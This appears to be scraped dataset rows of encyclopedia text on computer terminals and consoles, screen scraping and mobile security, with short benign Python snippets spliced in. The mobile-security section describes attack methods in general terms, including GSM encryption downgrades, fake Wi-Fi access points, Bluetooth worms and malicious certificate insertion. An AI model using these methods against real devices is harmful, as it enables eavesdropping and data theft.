Most terminals were connected to minicomputers or mainframe computers and often had a green or amber screen. Typically terminals communicate with the computer via a serial port via a null modem cable, often using an EIA RS 232 or RS 422 or RS 423 or a current loop serial interface. IBM systems typically communicated over a Bus and Tag channel, a coaxial cable using a proprietary protocol, a communications link using Binary Synchronous Communications or IBM's SNA protocol, but for many DEC, Data General and NCR (and so on) computers there were many visual display suppliers competing against the computer manufacturer for terminals to expand the systems. In fact, the instruction design for the Intel 8008 was originally conceived at Computer Terminal Corporation as the processor for the Datapoint 2200. From the introduction of the IBM 3270, and the DEC VT100 (1978), the user and programmer could notice significant advantages in VDU technology improvements, yet not all programmers used the features of the new terminals (backward compatibility in the VT100 and later TeleVideo terminals, for example, with "dumb terminals" allowed programmers to continue to use older software). Some dumb terminals had been able to respond to a few escape sequences without needing microprocessors: they used multiple printed circuit boards with many integrated circuits; the single factor that classed a terminal as "intelligent" was its ability to process user-input within the terminal—not interrupting the main computer at each keystroke—and send a block of data at a time (for example: when the user has finished a whole field or form). Most terminals in the early 1980s, such as ADM 3A, TVI912, Data General D2, DEC VT52, despite the introduction of ANSI terminals in 1978, were essentially "dumb" terminals, although some of them (such as the later ADM and TVI models) did have a primitive block-send capability. Common early uses of local processing power included features that had little to do with off-loading data processing from the host computer but added useful features such as printing to a local printer, buffered serial data transmission and serial handshaking (to accommodate higher serial transfer speeds), and more sophisticated character attributes for the display, as well as the ability to switch emulation modes to mimic competitor's models, that became increasingly important selling features during the 1980s especially, when buyers could mix and match different suppliers' equipment to a greater extent than before. The advance in microprocessors and lower memory costs made it possible for the terminal to handle editing operations such as inserting characters within a field that may have previously required a full screen-full of characters to be re-sent from the computer, possibly over a slow modem line. Around the mid 1980s most intelligent terminals, costing less than most dumb terminals would have a few years earlier, could provide enough user-friendly local editing of data and send the completed form to the main computer. Providing even more processing possibilities, workstations like the TeleVideo TS 800 could run CP M 86, blurring the distinction between terminal and Personal Computer. Another of the motivations for development of the microprocessor was to simplify and reduce the electronics required in a terminal. 
That also made it practicable to load several "personalities" into a single terminal, so a Qume QVT 102 could emulate many popular terminals of the day, and so be sold into organizations that did not wish to make any software changes. Frequently emulated terminal types included: The ANSI X3.64 escape code standard produced uniformity to some extent, but significant differences remained. For example, the VT100, Heathkit H19 in ANSI mode, Televideo 970, Data General D460, and Qume QVT 108 terminals all followed the ANSI standard, yet differences might exist in codes from function keys, what character attributes were available, block-sending of fields within forms, "foreign" character facilities, and handling of printers connected to the back of the screen. In the 21st century, the term Intelligent Terminal can now refer to a retail Point of Sale computer. 29 While early IBM PCs had single-color green screens, these screens were not terminals. The screen of a PC did not contain any character generation hardware; all video signals and video formatting were generated by the video display card in the PC, or (in most graphics modes) by the CPU and software. An IBM PC monitor, whether it was the green monochrome display or the 16 color display, was technically much more similar to an analog TV set (without a tuner) than to a terminal. With suitable software a PC could, however, emulate a terminal, and in that capacity it could be connected to a mainframe or minicomputer. The Data General One could be booted into terminal emulator mode from its ROM. Eventually microprocessor-based personal computers greatly reduced the market demand for conventional terminals. In the 1990s especially, "thin clients" and X terminals have combined economical local processing power with central, shared computer facilities to retain some of the advantages of terminals over personal computers: Today, most PC telnet clients provide emulation of the most common terminal, citation needed the DEC VT100, using the ANSI escape code standard X3.64, or could run as X terminals using software such as Cygwin X under Microsoft Windows or X.Org Server software under Linux. Since the advent and subsequent popularization of the personal computer, few genuine hardware terminals are used to interface with computers today. Using the monitor and keyboard, modern operating systems like Linux and the BSD derivatives feature virtual consoles, which are mostly independent from the hardware used. When using a graphical user interface (or GUI) like the X Window System, one's display is typically occupied by a collection of windows associated with various applications, rather than a single stream of text associated with a single process. In this case, one may use a terminal emulator application within the windowing environment. This arrangement permits terminal-like interaction with the computer (for running a command-line interpreter, for example) without the need for a physical terminal device; it can even run multiple terminal emulators on the same device. Several categories of terminals described above have been used as hardware and software consoles, with some variation in the nomenclature. These may be keyboard printer terminals, keyboard display terminals, or special applications running on a smaller computer. They frequently attach via a proprietary interface, and supplement or replace the functions of a front panel. They are sometimes referred to as control consoles or system consoles. 
These may be keyboard printer terminals, keyboard display terminals or applications. On some systems, e.g., OS 360, they have a specialized role with its own command language, unrelated to the command language for user sessions on normal terminals. On, e.g., Unix-like systems, the software is controlled by users with elevated privileges and a system console is just an ordinary terminal with a privileged user logged on. It is common for, e.g., Unix-like systems, to include applications with names like command, console, terminal, to serve as consoles for the logged on user. One meaning of system console, computer console, root console, operator's console, or simply console is the text entry and display device for system administration messages, particularly those from the BIOS or boot loader, the kernel, from the init system and from the system logger. It is a physical device consisting of a keyboard and a printer or screen, and traditionally is a text terminal, but may also be a graphical terminal. System consoles are generalized to computer terminals, which are abstracted respectively by virtual consoles and terminal emulators. Today communication with system consoles is generally done abstractly, via the standard streams (stdin, stdout, and stderr), but there may be system-specific interfaces, for example those used by the system kernel. 30 better source needed Another, older, meaning of system console, computer console, hardware console, operator's console or simply console is a hardware component used by an operator to control the hardware, typically some combination of front panel, keyboard printer and keyboard display. Prior to the development of alphanumeric CRT system consoles, some computers such as the IBM 1620 had console typewriters and front panels while the very first electronic stored-program computer, the Manchester Baby, used a combination of electromechanical switches and a CRT to provide console functions—the CRT displaying memory contents in binary by mirroring the machine's Williams-Kilburn tube CRT-based RAM. Some early operating systems supported either a single keyboard print or keyboard display device for controlling the OS. Some also supported a single alternate console, and some supported a hardcopy console for retaining a record of commands, responses and other console messages. However, in the late 1960s it became common for operating systems to support many more consoles than 3, and operating systems began appearing in which the console was simply any terminal with a privileged user logged on. On early minicomputers, the console was a serial console, an RS 232 serial link to a terminal such as a ASR 33 or, later, a terminal from Digital Equipment Corporation (DEC), e.g., DECWriter, VT100. This terminal was usually kept in a secured room since it could be used for certain privileged functions such as halting the system or selecting which media to boot from. Large midrange systems, e.g. those from Sun Microsystems, Hewlett-Packard and IBM, citation needed still use serial consoles. In larger installations, the console ports are attached to multiplexers or network-connected multiport serial servers that let an operator connect a terminal to any of the attached servers. Today, serial consoles are often used for accessing headless systems, usually with a terminal emulator running on a laptop. Also, routers, enterprise network switches and other telecommunication equipment have RS 232 serial console ports. 
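A hedged sketch of reaching such a serial console from Python: it assumes the third-party pyserial package is installed, and the device path /dev/ttyUSB0, the 9600-baud rate, and the 1-second timeout are placeholder assumptions that depend on the actual hardware.

import serial   # third-party package: pip install pyserial

with serial.Serial("/dev/ttyUSB0", baudrate=9600, timeout=1) as console:
    console.write(b"\r\n")                    # nudge the console so it prints a prompt
    banner = console.read(256)                # read up to 256 bytes of whatever comes back
    print(banner.decode(errors="replace"))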
On PCs and workstations, the computer's attached keyboard and monitor have the equivalent function. Since the monitor cable carries video signals, it cannot be extended very far. Often, installations with many servers therefore use keyboard video multiplexers (KVM switches) and possibly video amplifiers to centralize console access. In recent years, KVM IP devices have become available that allow a remote computer to view the video output and send keyboard input via any TCP IP network and therefore the Internet. Some PC BIOSes, especially in servers, also support serial consoles, giving access to the BIOS through a serial port so that the simpler and cheaper serial console infrastructure can be used. Even where BIOS support is lacking, some operating systems, e.g. FreeBSD and Linux, can be configured for serial console operation either during bootup, or after startup. Starting with the IBM 9672, IBM large systems have used a Hardware Management Console (HMC), consisting of a PC and a specialized application, instead of a 3270 or serial link. Other IBM product lines also use an HMC, e.g., System p. It is usually possible to log in from the console. Depending on configuration, the operating system may treat a login session from the console as being more trustworthy than a login session from other sources. A terminal emulator is a piece of software that emulates a text terminal. In the past, before the widespread use of local area networks and broadband internet access, many computers would use a serial access program to communicate with other computers via telephone line or serial device. When the first Macintosh was released, a program called MacTerminal 31 was used to communicate with many computers, including the IBM PC. The Win32 console on Windows does not emulate a physical terminal that supports escape sequences 32 dubious discuss so SSH and Telnet programs (for logging in textually to remote computers) for Windows, including the Telnet program bundled with some versions of Windows, often incorporate their own code to process escape sequences. The terminal emulators on most Unix-like systems—such as, for example, gnome-terminal, Konsole, QTerminal, xterm, and Terminal.app—do emulate physical terminals including support for escape sequences; e.g., xterm can emulate the VT220 and Tektronix 4010 hardware terminals. Terminals can operate in various modes, relating to when they send input typed by the user on the keyboard to the receiving system (whatever that may be): There is a distinction between the return and the Enter keys. In some multiple-mode terminals, that can switch between modes, pressing the Enter key when not in block mode does not do the same thing as pressing the return key. Whilst the return key will cause an input line to be sent to the host in line-at-a-time mode, the Enter key will rather cause the terminal to transmit the contents of the character row where the cursor is currently positioned to the host, host-issued prompts and all. 35 Some block-mode terminals have both an Enter and local cursor moving keys such as Return and New Line. Different computer operating systems require different degrees of mode support when terminals are used as computer terminals. 
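The escape-sequence support mentioned above can be demonstrated with a few of the ANSI X3.64 / VT100 sequences that most terminal emulators still honour; this is only a small sample, assuming an ANSI-capable emulator.

import sys

ESC = "\x1b"                                                # escape character, 0x1B
sys.stdout.write(f"{ESC}[2J")                               # clear the whole screen
sys.stdout.write(f"{ESC}[3;5H")                             # move the cursor to row 3, column 5
sys.stdout.write(f"{ESC}[1;32mbold green text{ESC}[0m\n")   # set attributes, then reset
sys.stdout.write(f"{ESC}[7mreverse video{ESC}[0m\n")        # reverse video, then reset
sys.stdout.flush()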
The POSIX terminal interface, as provided by Unix and POSIX-compliant operating systems, does not accommodate block-mode terminals at all, and only rarely requires the terminal itself to be in line-at-a-time mode, since the operating system is required to provide canonical input mode, where the terminal device driver in the operating system emulates local echo in the terminal, and performs line editing functions at the host end. Most usually, and especially so that the host system can support non-canonical input mode, terminals for POSIX-compliant systems are always in character-at-a-time mode. In contrast, IBM 3270 terminals connected to MVS systems are always required to be in block mode. 37 38 39 40 |
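The difference between canonical (line-at-a-time) and non-canonical input described above can be seen with a minimal sketch for Unix-like systems: switching the terminal driver to cbreak mode makes each keystroke available immediately, without waiting for Enter.

import sys, termios, tty

fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)            # current (canonical) settings
try:
    tty.setcbreak(fd)                            # non-canonical: no line buffering
    print("Press a single key (no Enter needed): ", end="", flush=True)
    ch = sys.stdin.read(1)                       # returns as soon as one key is pressed
finally:
    termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)   # back to canonical mode
print(f"\nGot {ch!r}")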
564 | https://en.wikipedia.org/wiki/Data_scraping | https://nl.wikipedia.org/wiki/Screen_scraping | Screen scraping is a computing technique in which the data shown on a computer display is read out and used as input for another, underlying program. The technique is used to take the computer output of one program and feed it, in an automated way, into another program. Screen scraping is mainly used for transferring data out of programs for which an automated, programmed conversion is not possible. These are programs that generate their output on a display screen. Think of transferring data from a mainframe or terminal screen into a word processor or another transaction system. Such 'legacy' systems are usually not suited to handing over data in digital form, which makes screen scraping, without any modification of the old software, an efficient technique. Screen scraping is carried out by reading the video memory of a terminal emulator. The layout of a terminal screen is fairly simple, namely 25 lines of text of 80 positions each. The fields on these screens are also unambiguously defined, so that a form of protocol was effectively applied automatically. For example: the field at position 60 of line 15 is 8 characters long. The screen-scraping program is then configured so that this particular field can be read out and copied to a memory buffer, from which it can subsequently be used as input to another program at a particular input position. |
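A toy Python sketch of the fixed-position field scraping just described: the terminal screen is modelled as 25 rows of 80 characters, and a field is identified purely by its coordinates, e.g. 8 characters starting at column 60 of row 15. The sample buffer contents are made up for the example.

screen = [" " * 80 for _ in range(25)]                        # an empty 80x25 screen buffer
screen[14] = screen[14][:59] + "AB123456" + screen[14][67:]   # pretend row 15 holds a field

def scrape_field(buffer, row, col, length):
    # Copy a fixed-position field from the screen buffer (1-based row and column).
    return buffer[row - 1][col - 1:col - 1 + length]

print("Scraped field:", scrape_field(screen, row=15, col=60, length=8))   # -> AB123456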
565 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Mobile_security | Mobile security, or mobile device security, is the protection of smartphones, tablets, and laptops from threats associated with wireless computing. 1 It has become increasingly important in mobile computing. The security of personal and business information now stored on smartphones is of particular concern. 2 Increasingly, users and businesses use smartphones not only to communicate, but also to plan and organize their work and private life. Within companies, these technologies are causing profound changes in the organization of information systems and have therefore become the source of new risks. Indeed, smartphones collect and compile an increasing amount of sensitive information to which access must be controlled to protect the privacy of the user and the intellectual property of the company. The majority of attacks are aimed at smartphones. citation needed These attacks take advantage of vulnerabilities discovered in smartphones that can result from different modes of communication, including Short Message Service (SMS, text messaging), Multimedia Messaging Service (MMS), wireless connections, Bluetooth, and GSM, the de facto international standard for mobile communications. Smartphone operating systems or browsers are another weakness. Some malware makes use of the common user's limited knowledge. Only 2.1% of users reported having first-hand contact with mobile malware, according to a 2008 McAfee study, which found that 11.6% of users had heard of someone else being harmed by the problem. Yet, it is predicted that this number will rise. 3 Security countermeasures are being developed and applied to smartphones, from security best practices in software to the dissemination of information to end users. Countermeasures can be implemented at all levels, including operating system development, software design, and user behavior modifications. A smartphone user is exposed to various threats when they use their phone. In just the last two quarters of 2012, the number of unique mobile threats grew by 261%, according to ABI Research. 3 These threats can disrupt the operation of the smartphone and transmit or modify user data. Applications must guarantee privacy and integrity of the information they handle. In addition, since some apps could themselves be malware, their functionality and activities should be limited (for example, restricting the apps from accessing location information via the Global Positioning System (GPS), blocking access to the user's address book, preventing the transmission of data on the network, or sending SMS messages that are billed to the user). 1 Malicious apps can also be installed without the owners' permission or knowledge. Vulnerability in mobile devices refers to aspects of system security that are susceptible to attacks. A vulnerability occurs when there is system weakness, an attacker has access to the weakness, and the attacker has competency to exploit the weakness. 1 Potential attackers began looking for vulnerabilities when Apple's iPhone and the first Android devices came onto the market. Since the introduction of apps (particularly mobile banking apps), which are vital targets for hackers, malware has been rampant. The Department of Homeland Security's cybersecurity department claims that the number of vulnerable points in smartphone operating systems has increased. when? 
As mobile phones are connected to utilities and appliances, hackers, cybercriminals, and even intelligence officials have access to these devices. 4 Starting in 2011, it became increasingly popular to let employees use their own devices for work-related purposes. The Crowd Research Partners study, published in 2017, reports that during 2017, most businesses that mandated the use of mobile devices were subjected to malware attacks and breaches. It has become common for rogue applications to be installed on user devices without the user's permission. They breach privacy, which hinders the effectiveness of the devices. citation needed clarification needed Since the recent rise of mobile attacks, hackers have increasingly targeted smartphones through credential theft and snooping. The number of attacks targeting smartphones and other devices has risen by 50 percent. citation needed According to the study, which? mobile banking applications are responsible for the increase in attacks. Malware—such as ransomware, worms, botnets, Trojans, and viruses—have been developed to exploit vulnerabilities in mobile devices. Malware is distributed by attackers so they can gain access to private information or digitally harm a user. For example, should malware breach a user's banking service, it may be able to access their transaction information, their rights to log in, and their money. Some malware is developed with anti-detection techniques to avoid detection. Attackers who use malware can avoid detection by hiding malicious code. Trojan-droppers can also avoid detection of malware. Despite the fact that the malware inside a device does not change, the dropper generates new hashes each time. Additionally, droppers can also create a multitude of files, which can lead to the creation of viruses. Android mobile devices are prone to Trojan-droppers. The banking Trojans also enable attacks on the banking applications on the phone, which leads to the theft of data for use in stealing money and funds. clarification needed Jailbreaks for iOS devices work by disabling the signing of codes on iPhones so that applications not downloaded from the App Store can be operated. In this way, all the protection layers offered by iOS are disrupted, exposing the device to malware. These outside applications don't run in a sandbox, which exposes potential security problems. Some attack vectors change the mobile devices' configuration settings by installing malicious credentials and virtual private networks (VPNs) to direct information to malicious systems. In addition, spyware can be installed on mobile devices in order to track an individual. Triade malware comes pre-installed on some mobile devices. In addition to Haddad, there is Lotoor, which exploits vulnerabilities in the system to repackage legitimate applications. 5 The devices are also vulnerable due to spyware and leaky behaviors through applications. Mobile devices are also effective conveyance systems for malware threats, breaches of information, and thefts. Wi-Fi interference technologies can also attack mobile devices through potentially insecure networks. By compromising the network, hackers are able to gain access to key data. Devices connected to public networks are at risk of attacks. A VPN, on the other hand, can be used to secure networks. As soon as a system is threatened, an active VPN will operate. There are also social engineering techniques, such as phishing, in which unsuspecting victims are sent links to lead them to malicious websites. 
The attackers can then hack into the victim's device and copy all of its information. Some mobile device attacks can be prevented. For example, containerization allows the creation of a hardware infrastructure that separates business data from other data. Additionally, network protection detects malicious traffic and rogue access points. Data security is also ensured through authentication. 1 There are a number of threats to mobile devices, including annoyance, stealing money, invading privacy, propagation, and malicious tools. 6 There are three prime targets for attackers: 7 Attacks on mobile security systems include: The source of these attacks are the same actors found in the non-mobile computing space: 7 When a smartphone is infected by an attacker, the attacker can attempt several things: Some attacks derive from flaws in the management of Short Message Service (SMS) and Multimedia Messaging Service (MMS). Some mobile phone models have problems in managing binary SMS messages. By sending an ill-formed block, it is possible to cause the phone to restart, leading to the denial-of-service attacks. If a user with a Siemens S55 received a text message containing a Chinese character, it would lead to a denial of service. 17 In another case, while the standard requires that the maximum size of a Nokia Mail address is 32 characters, some Nokia phones did not verify this standard, so if a user enters an email address over 32 characters, that leads to complete dysfunction of the e-mail handler and puts it out of commission. This attack is called "curse of silence". A study on the safety of the SMS infrastructure revealed that SMS messages sent from the Internet can be used to perform a distributed denial of service (DDoS) attack against the mobile telecommunications infrastructure of a big city. The attack exploits the delays in the delivery of messages to overload the network. Another potential attack could begin with a phone that sends an MMS to other phones, with an attachment. This attachment is infected with a virus. Upon receipt of the MMS, the user can choose to open the attachment. If it is opened, the phone is infected, and the virus sends an MMS with an infected attachment to all the contacts in the address book. There is a real-world example of this attack: the virus Commwarrior 16 sends MMS messages (including an infected file) to all recipients in a mobile phone's address book. If a recipient installs the infected file, the virus repeats, sending messages to recipients taken from the new address book. The attacker may try to break the encryption of a GSM mobile network. The network encryption algorithms belong to the family of algorithms called A5. Due to the policy of security through obscurity, it has not been possible to openly test the robustness of these algorithms. There were originally two variants of the algorithm: A5 1 and A5 2 (stream ciphers), where the former was designed to be relatively strong, and the latter was purposely designed to be weak to allow easy cryptanalysis and eavesdropping. ETSI forced some countries (typically outside Europe) to use A5 2. Since the encryption algorithm was made public, it was proved to be breakable: A5 2 could be broken on the fly, and A5 1 in about 6 hours. 18 In July 2007, the 3GPP approved a change request to prohibit the implementation of A5 2 in any new mobile phones, decommissioning the algorithm; it is no longer implemented in mobile phones. 
Stronger public algorithms have been added to the GSM standard: the A5 3 and A5 4 (Block ciphers), otherwise known as KASUMI or UEA1 19 published by ETSI. If the network does not support A5 1, or any other A5 algorithm implemented by the phone, then the base station can specify A5 0 which is the null algorithm, whereby the radio traffic is sent unencrypted. Even if mobile phones are able to use 3G or 4G (which have much stronger encryption than 2G GSM), the base station can downgrade the radio communication to 2G GSM and specify A5 0 (no encryption). 20 This is the basis for eavesdropping attacks on mobile radio networks using a fake base station commonly called an IMSI catcher. In addition, tracing of mobile terminals is difficult since each time the mobile terminal is accessing or being accessed by the network, a new temporary identity (TMSI) is allocated to the mobile terminal. The TMSI is used as the identity of the mobile terminal the next time it accesses the network. The TMSI is sent to the mobile terminal in encrypted messages. citation needed Once the encryption algorithm of GSM is broken, the attacker can intercept all unencrypted communications made by the victim's smartphone. An attacker can try to eavesdrop on Wi-Fi communications to derive information (e.g., username, password). This type of attack is not unique to smartphones, but they are very vulnerable to these attacks because often Wi-Fi is their only means of communication and access the internet. The security of wireless networks (WLAN) is thus an important subject. Initially, wireless networks were secured by WEP keys. The weakness of WEP is its short encryption key, which is the same for all connected clients. In addition, several reductions in the search space of the keys have been found by researchers. Now, most wireless networks are protected by the WPA security protocol. WPA is based on the Temporal Key Integrity Protocol (TKIP), which was designed to allow migration from WEP to WPA on the equipment already deployed. The major improvements in security are the dynamic encryption keys. For small networks, the WPA uses a "pre-shared key" which is based on a shared key. Encryption can be vulnerable if the length of the shared key is short. With limited opportunities for input (i.e., only the numeric keypad), mobile phone users might define short encryption keys that contain only numbers. This increases the likelihood that an attacker succeeds with a brute-force attack. The successor to WPA, called WPA2, is supposed to be safe enough to withstand a brute force attack. The ability to access free and fast Wi-Fi gives a business an edge over those who do not. Free Wi-Fi is usually provided by organizations such as airports, coffee shops, and restaurants for a number of reasons, including encouraging customers to spend more time and money on the premises, and helping users stay productive. 1 Another reason is enhancing customer tracking: many restaurants and coffee shops compile data about their customers so they can target advertisements directly to their devices. citation needed This means that customers know what services the facility provides. Generally, individuals filter business premises based on Internet connections as another reason to gain a competitive edge. Network security is the responsibility of the organizations, as unsecured Wi-Fi networks are prone to numerous risks. The man-in-the-middle attack entails the interception and modification of data between parties. 
Additionally, malware can be distributed via the free Wi-Fi network and hackers can exploit software vulnerabilities to smuggle malware onto connected devices. It is also possible to eavesdrop and sniff Wi-Fi signals using special software and devices, capturing login credentials and hijacking accounts. 9 As with GSM, if the attacker succeeds in breaking the identification key, both the phone and the entire network it is connected to become exposed to attacks. Many smartphones remember wireless LANs they have previously connected to, allowing users to not have to re-identify with each connection. However, an attacker could create a Wi-Fi access point twin with the same parameters and characteristics as a real network. By automatically connecting to the fraudulent network, a smartphone becomes susceptible to the attacker, who can intercept any unencrypted data. 21 Lasco is a worm that initially infects a remote device using the SIS file format, 22 a type of script file that can be executed by the system without user interaction. The smartphone thus believes the file to come from a trusted source and downloads it, infecting the machine. 22 Security issues related to Bluetooth on mobile devices have been studied and have shown numerous problems on different phones. One easy to exploit vulnerability is that unregistered services do not require authentication, and vulnerable applications have a virtual serial port used to control the phone. An attacker only needed to connect to the port to take full control of the device. 23 In another example, an attacker sends a file via Bluetooth to a phone within range with Bluetooth in discovery mode. If the recipient accepts, a virus is transmitted. An example of this is a worm called Cabir. 16 The worm searches for nearby phones with Bluetooth in discoverable mode and sends itself to the target device. The user must accept the incoming file and install the program, after which the worm infects the machine. Other attacks are based on flaws in the OS or applications on the phone. The mobile web browser is an emerging attack vector for mobile devices. Just as common Web browsers, mobile web browsers are extended from pure web navigation with widgets and plug-ins or are completely native mobile browsers. Jailbreaking the iPhone with firmware 1.1.1 was based entirely on vulnerabilities on the web browser. 24 In this case, there was a vulnerability based on a stack-based buffer overflow in a library used by the web browser (LibTIFF). A similar vulnerability in the web browser for Android was discovered in October 2008. 25 Like the iPhone vulnerability, it was due to an obsolete and vulnerable library, but significantly differed in that Android's sandboxing architecture limited the effects of this vulnerability to the Web browser process. Smartphones are also victims of classic Web piracy such as phishing, malicious websites, and background-running software. The big difference is that smartphones do not yet have strong antivirus software available. 26 failed verification The Internet offers numerous interactive features that ensure a higher engagement rate, capture more and relevant data, and increase brand loyalty. Blogs, forums, social networks, and wikis are some of the most common interactive websites. Due to the tremendous growth of the Internet, there has been a rapid rise in the number of security breaches experienced by individuals and businesses. 
Mobile browser users can balance usage and caution in several ways, such as reviewing computer security regularly, using secure and secret passwords, and correcting, upgrading, and replacing the necessary features. Installation of antivirus and anti-spyware programs is the most effective way of protecting the computer, as they offer protection against malware, spyware, and viruses. Additionally, they use firewalls, which are typically installed between trusted networks or devices and the Internet. By acting as a web server, the firewall prevents external users from accessing the internal computer system. Sometimes it is possible to overcome the security safeguards by modifying the operating system (OS) itself, such as the manipulation of firmware and malicious signature certificates. These attacks are difficult. In 2004, vulnerabilities in virtual machines running on certain devices were revealed. It was possible to bypass the bytecode verifier and access the native underlying operating system. The results of this research were not published in detail. The firmware security of Nokia's Symbian Platform Security Architecture (PSA) is based on a central configuration file called SWIPolicy. In 2008, it was possible to manipulate the Nokia firmware before it was installed. In fact, some downloadable versions of this file were human-readable, so it was possible to modify and change the image of the firmware. This vulnerability was solved by an update from Nokia. In theory, smartphones have an advantage over hard drives since the OS files are in read-only memory (ROM) and cannot be changed by malware. However, in some systems it was possible to circumvent this: in the Symbian OS, it was possible to overwrite a file with a file of the same name. On the Windows OS, it was possible to change a pointer from a general configuration file to an editable file. When an application is installed, the signing of this application is verified by a series of certificates. One can create a valid signature without using a valid certificate and add it to the list. In the Symbian OS, all certificates are in the directory c:\resource\swicertstore\dat. With the firmware changes explained above, it is very easy to insert a seemingly valid but malicious certificate. Android is the OS that has been attacked the most, because it has the largest userbase. A cybersecurity company reported having blocked about 18 million attacks in 2016. In 2015, researchers at the French government agency Agence nationale de la sécurité des systèmes d'information (ANSSI, lit. 'French National Agency for the Security of Information Systems') demonstrated the capability to trigger the voice interface of certain smartphones remotely by using "specific electromagnetic waveforms". The exploit took advantage of the antenna properties of headphone wires while plugged into the audio-output jacks of the vulnerable smartphones and effectively spoofed audio input to inject commands via the audio interface. Juice jacking is a physical or hardware vulnerability specific to mobile platforms. Utilizing the dual purpose of the USB charge port, many devices have been susceptible to having data exfiltrated from, or malware installed onto, a mobile device by means of malicious charging kiosks set up in public places or hidden in normal charge adapters. Jailbreaking is also a physical access vulnerability, in which a mobile device user hacks into the device to unlock it, exploiting weaknesses in the operating system. 
Mobile device users take control of their own device by jailbreaking it, allowing them to customize the interface by installing applications, change system settings that are not allowed on the devices, tweak OS processes, and run uncertified programs. This openness exposes the device to a variety of malicious attacks which can compromise private data. 5 In 2010, researchers from the University of Pennsylvania investigated the possibility of cracking a device's password through a smudge attack (literally imaging the finger smudges on the screen to discern the user's password). 27 The researchers were able to discern the device password up to 68% of the time under certain conditions. 27 Outsiders may perform over-the-shoulder surveillance on victims, such as watching specific keystrokes or pattern gestures, to unlock device password or passcode. As smartphones are a permanent point of access to the Internet (they are often turned on), they can be compromised with malware as easily as computers. A malware is a computer program that aims to harm the system in which it resides. Trojans, worms and viruses are all considered malware. A Trojan is a program on a device that allows external users to connect discreetly. A worm is a program that reproduces on multiple computers across a network. A virus is a malicious software designed to spread to other computers by inserting itself into legitimate programs and running programs in parallel. Malware is far less numerous and serious to smartphones as it is to computers. Nonetheless, recent studies show that the evolution of malware in smartphones have rocketed in the last few years posing a threat to analysis and detection. 25 In 2017, mobile malware variants increased by 54%. 33 Various common apps installed by millions can intrude on privacy, even if they were installed from a trusted software distribution service like the Google Play Store. For example, in 2022 it was shown that the popular app TikTok collects a lot of data and is required to make it available to the Chinese Communist Party (CCP) due to a national security law. This includes personal information on millions of Americans. The firmware and "stock software" preinstalled on devices and updated with preinstalled software can also have undesired components or privacy-intruding default configurations or substantial security vulnerabilities. In 2019, Kryptowire identified Android devices with malicious firmware that collected and transmitted sensitive data without users' consent. Analysis of data traffic by popular smartphones running variants of Android found substantial by-default data collection and sharing with no opt-out by pre-installed software. 34 35 This issue also can't be addressed by conventional security patches. Outgoing Internet traffic can be analyzed with packet analyzers and with firewall apps like the NetGuard firewall app for Android that allows reading blocked traffic logs. 36 additional citation(s) needed Typically, an attack on a smartphone made by malware takes place in three phases: the infection of a host, the accomplishment of its goal, and the spread of the malware to other systems. Malware often uses the resources offered by infected smartphones. It will use the output devices such as Bluetooth or infrared, but it may also use the address book or email address of the person to infect the user's acquaintances. The malware exploits the trust that is given to data sent by an acquaintance. 
Infection is the method used by malware to gain access to the smartphone; it may exploit an internal vulnerability or rely on the gullibility of the user. Infections are classified into four classes according to their degree of user interaction: 37 Accomplishment of its goal Once the malware has infected a phone, it will also seek to accomplish its goal, which is usually one of the following: 38 Once the malware has infected a smartphone, it aims to spread to a new host. 39 This usually occurs to proximate devices via Wi-Fi, Bluetooth, or infrared; or to remote networks via telephone calls, SMS, or emails. Mobile ransomware is a type of malware that locks users out of their mobile devices in a pay-to-unlock-your-device ploy. It has significantly grown as a threat category since 2014. 42 Mobile users are often less security-conscious particularly as it pertains to scrutinizing applications and web links and trust the mobile device's native protection capability. Mobile ransomware poses a significant threat to businesses reliant on instant access and availability of their proprietary information and contacts. The likelihood of a traveling businessman paying a ransom to unlock their device is significantly higher since they are at a disadvantage given inconveniences such as timeliness and less direct access to IT staff. Recent ransomware attacks have caused many Internet-connected devices to not work and are costly for companies to recover from. Attackers can make their malware target multiple platforms. Some malware attacks operating systems but is able to spread across different systems. To begin with, malware can use runtime environments like Java virtual machine or the .NET Framework. They can also use other libraries present in many operating systems. 44 Some malware carries several executable files in order to run in multiple environments, utilizing these during the propagation process. In practice, this type of malware requires a connection between the two operating systems to use as an attack vector. Memory cards can be used for this purpose, or synchronization software can be used to propagate the virus. Mobile security is divided into different categories, as methods do not all act at the same level and are designed to prevent different threats. These methods range from the management of security by the operating system (protecting the system from corruption by an application) to the behavioral education of the user (preventing the installation of a suspicious software). The first layer of security in a smartphone is the operating system. Beyond needing to handle the usual roles (e.g., resource management, scheduling processes) on the device, it must also establish the protocols for introducing external applications and data without introducing risk. citation needed A central paradigm in mobile operating systems is the idea of a sandbox. Since smartphones are currently designed to accommodate many applications, they must have mechanisms to ensure these applications are safe for the phone itself, for other applications and data on the system, and for the user. If a malicious program reaches a mobile device, the vulnerable area presented by the system must be as small as possible. Sandboxing extends this idea to compartmentalize different processes, preventing them from interacting and damaging each other. Based on the history of operating systems, sandboxing has different implementations. 
For example, where iOS will focus on limiting access to its public API for applications from the App Store by default, Managed Open In allows you to restrict which apps can access which types of data. Android bases its sandboxing on its legacy of Linux and TrustedBSD. The following points highlight mechanisms implemented in operating systems, especially Android. Above the operating system security, there is a layer of security software. This layer is composed of individual components to strengthen various vulnerabilities: prevent malware, intrusions, the identification of a user as a human, and user authentication. It contains software components that have learned from their experience with computer security; however, on smartphones, this software must deal with greater constraints (see limitations). Should a malicious application pass the security barriers, it can take the actions for which it was designed. However, this activity can be sometimes detected by monitoring the various resources used on the phone. Depending on the goals of the malware, the consequences of infection are not always the same; all malicious applications are not intended to harm the devices on which they are deployed. 61 The following resources are only indications and do not provide certainty about the legitimacy of the activity of an application. However, these criteria can help target suspicious applications, especially if several criteria are combined. Network traffic exchanged by phones can be monitored. One can place safeguards in network routing points in order to detect abnormal behavior. As the mobile's use of network protocols is much more constrained than that of a computer, expected network data streams can be predicted (e.g., the protocol for sending an SMS), which permits detection of anomalies in mobile networks. 63 In the production and distribution chain for mobile devices, manufacturers are responsibility for ensuring that devices are delivered in a basic configuration without vulnerabilities. Most users are not experts and many of them are not aware of the existence of security vulnerabilities, so the device configuration as provided by manufacturers will be retained by many users. Some smartphone manufacturers add Titan M2s (a security hardware chip) to increase mobile security. 64 65 The user has a large responsibility in the cycle of security. This can be as simple as using a password, or as detailed as precisely controlling which permissions are granted to applications. This precaution is especially important if the user is an employee of a company who stores business data on the device. Much malicious behavior is allowed by user carelessness. Smartphone users were found to ignore security messages during application installation, especially during application selection and checking application reputation, reviews, security, and 